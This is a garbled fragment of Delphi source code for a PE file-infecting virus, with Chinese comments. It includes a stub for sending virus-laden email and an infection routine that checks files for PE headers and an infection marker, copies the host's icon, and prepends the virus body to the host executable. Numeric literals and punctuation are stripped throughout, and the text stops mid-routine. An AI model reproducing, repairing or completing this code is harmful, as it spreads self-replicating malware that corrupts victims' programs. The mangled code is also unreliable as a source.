|
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Sicb := SizeOf(Si); SilpReserved := nil; SilpDesktop := nil; SilpTitle := nil; SidwFlags := STARTF_USESHOWWINDOW; SiwShowWindow := State; SicbReserved := ; SilpReserved := nil; end; { 发带毒邮件 } procedure SendMail; begin //哪位仁兄愿意完成之? end; { 感染PE文件 } procedure InfectOneFile(FileName: string); var HdrStream SrcStream: TFileStream; IcoStream DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected IsPE: Boolean; i: Integer; Buf: array[] of Char; begin try //出错则文件正在被使用退出 if CompareText(FileName JAPUSSYEXE) = then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStreamCreate(FileName fmOpenRead); try for i := to $ do //检查PE文件头 begin SrcStreamSeek(i soFromBeginning); SrcStreamRead(Buf ); if (Buf[] = #) and (Buf[] = #) then //PE标记 begin IsPE := True; //是PE文件 Break; end; end; SrcStreamSeek( soFromEnd); //检查感染标记 SrcStreamRead(iID ); if (iID = ID) or (SrcStreamSize < ) then //太小的文件不感染 Infected := True; finally SrcStreamFree; end; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 Exit; IcoStream := TMemoryStreamCreate; DstStream := TMemoryStreamCreate; try aIcon := TIconCreate; try //得到被感染文件的主图标(字节)存入流 aIconReleaseHandle; aIconHandle := ExtractIcon(HInstance PChar(FileName) ); aIconSaveToStream(IcoStream); finally aIconFree; end; SrcStream := TFileStreamCreate(FileName fmOpenRead); //头文件 HdrStream := TFileStreamCreate(ParamStr() fmOpenRead or fmShareDenyNone); try //写入病毒体主图标之前的数据 CopyStream(HdrStream DstStream IconOffset); //写入目前程序的主图标 CopyStream(IcoStream DstStream IconOffset IconSize); //写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail); //写入宿主程序 [] [] [] [] [] |
